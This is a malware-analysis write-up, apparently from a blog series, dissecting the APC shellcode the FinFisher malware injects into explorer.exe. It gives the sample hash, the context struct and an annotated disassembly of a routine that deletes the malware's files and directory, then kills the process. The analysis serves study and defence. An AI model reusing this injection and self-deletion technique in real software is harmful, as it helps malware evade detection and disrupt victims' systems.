
Shellcode of the Finfisher malware

This is just a short writeup, because the shellcode that gets called in the explorer.exe context is really small and does not do much. Part 1 Part 2 Part 4 Part 5

Filename sha256
finfisher.1.bin.exe f827c92fbe832db3f09f47fe0dcaafd89b40c7064ab90833a1f418f2d1e75e8e
  • In the last article I already posted this struct. A pointer to it is passed as the single argument of the APC that gets queued into explorer.exe via QueueUserAPC.
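/*
 * Context block passed (by pointer) as the single argument of the APC that is
 * queued into explorer.exe via QueueUserAPC. The field offsets are exactly the
 * ones the APC routine dereferences ([esi+0x414] etc.), so this is the 32-bit
 * (x86) layout: HANDLE and the API pointers are 4 bytes each and the whole
 * block is 0x424 bytes. The original listing lacked a typedef name and the
 * closing semicolon; both are added so the declaration compiles.
 */
typedef struct {
    /* 0x00000 */ HANDLE duplicated_handle;        /* waited on with an INFINITE timeout before anything is deleted */
    /* 0x00004 */ char   filename1[0x104];         /* path passed to DeleteFileW; afterwards NUL-terminated at its last
                                                      backslash and passed to RemoveDirectoryW */
    /* 0x00108 */ char   unknown_1[0x20C-0x108];   /* NOTE(review): DeleteFileW takes a wide string, and filename1 plus this
                                                      gap is 0x208 = MAX_PATH*sizeof(WCHAR); probably one WCHAR[MAX_PATH]
                                                      buffer rather than two fields -- confirm */
    /* 0x0020C */ char   filename_copy[0x104];     /* second path, also passed to DeleteFileW */
    /* 0x00310 */ char   unknown_2[0x414-0x310];   /* same 0x104-byte gap as after filename1 (see note above) */
    /* 0x00414 */ void*  WaitForSingleObject;      /* resolved API pointers; the APC calls through these slots
                                                      (call dword [esi+0x414] etc.) */
    /* 0x00418 */ void*  ExitProcess;
    /* 0x0041C */ void*  DeleteFileW;
    /* 0x00420 */ void*  RemoveDirectoryW;
} apc_context_t;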
  • This block is called through QueueUserAPC in the context of explorer.exe. It first waits (INFINITE timeout) on the duplicated handle, then deletes both copies of the executable (filename1 and filename_copy). It then scans filename1 forward to its NUL terminator and backward to the last backslash, overwrites that backslash with a NUL to turn the path into its containing directory, removes that directory, and finally calls ExitProcess(0) — the epilogue after it is never reached. Note that the backward scan has no lower bound, so the routine assumes filename1 is a full path containing at least one backslash.
; APC routine queued into explorer.exe. stdcall with one 4-byte argument
; (ret 0x4): [ebp+0x8] = pointer to the context struct shown above.
; Offsets dereferenced below: 0x000 handle, 0x004 filename1, 0x20C
; filename_copy, 0x414 WaitForSingleObject, 0x418 ExitProcess,
; 0x41C DeleteFileW, 0x420 RemoveDirectoryW.
; Register roles: esi = struct pointer, ebx = &filename1,
; edi = &DeleteFileW slot (later 0), eax = scan cursor into filename1.
0x00401849    8bff         mov edi, edi               ; 2-byte no-op (hot-patch style padding)
0x0040184b    55           push ebp
0x0040184c    8bec         mov ebp, esp
0x0040184e    53           push ebx                   ; save callee-saved registers used below
0x0040184f    56           push esi
0x00401850    8b7508       mov esi, [ebp+0x8]         ; esi = context struct (the only argument)
0x00401853    57           push edi
0x00401854    6aff         push 0xffffffff            ; dwMilliseconds = INFINITE
0x00401856    ff36         push dword [esi]           ; hHandle = duplicated_handle (offset 0x000)
0x00401858    ff9614040000 call dword [esi+0x414]     ; WaitForSingleObject(duplicated_handle, INFINITE); return value ignored
0x0040185e    8d5e04       lea ebx, [esi+0x4]         ; ebx = filename1
0x00401861    8dbe1c040000 lea edi, [esi+0x41c]       ; edi = address of the DeleteFileW slot (called twice below)
0x00401867    53           push ebx                   ; lpFileName = filename1
0x00401868    ff17         call dword [edi]           ; DeleteFileW(filename1)
0x0040186a    8d860c020000 lea eax, [esi+0x20c]       ; eax = filename_copy (second copy of the executable)
0x00401870    50           push eax                   ; lpFileName = filename_copy
0x00401871    ff17         call dword [edi]           ; DeleteFileW(filename_copy)
0x00401873    8bc3         mov eax, ebx               ; eax = scan cursor, starts at filename1
0x00401875    33ff         xor edi, edi               ; edi = 0: used as the 16-bit compare/store value and as the exit code
0x00401877    eb02         jmp 0x40187b               ; enter the forward scan at its test
0x00401879    40           inc eax                    ; advance one wide char (2 bytes)
0x0040187a    40           inc eax
0x0040187b    663938       cmp [eax], di              ; forward scan: stop at the WCHAR NUL terminator
0x0040187e    75f9         jne 0x401879               ; no upper bound -- relies on filename1 being NUL-terminated
0x00401880    eb02         jmp 0x401884               ; enter the backward scan at its test
0x00401882    48           dec eax                    ; step back one wide char
0x00401883    48           dec eax
0x00401884    6683385c     cmp word [eax], 0x5c       ; backward scan: look for the last L'\\' (0x5c)
0x00401888    75f8         jne 0x401882               ; no lower bound -- if the path has no backslash the scan runs past the start of filename1
0x0040188a    53           push ebx                   ; lpPathName = filename1
0x0040188b    668938       mov [eax], di              ; overwrite that backslash with L'\0': filename1 is now the containing directory
0x0040188e    ff9620040000 call dword [esi+0x420]     ; RemoveDirectoryW(directory)
0x00401894    57           push edi                   ; uExitCode = 0
0x00401895    ff9618040000 call dword [esi+0x418]     ; ExitProcess(0) -- never returns, so explorer.exe dies here
0x0040189b    5f           pop edi                    ; epilogue below is unreachable (dead code after ExitProcess)
0x0040189c    5e           pop esi
0x0040189d    5b           pop ebx
0x0040189e    5d           pop ebp
0x0040189f    c20400       ret 0x4                    ; stdcall: pop the single 4-byte argument

